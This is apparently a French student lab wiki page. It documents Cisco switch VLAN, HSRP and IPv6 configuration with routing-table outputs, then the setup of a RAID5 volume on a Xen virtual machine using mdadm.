* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
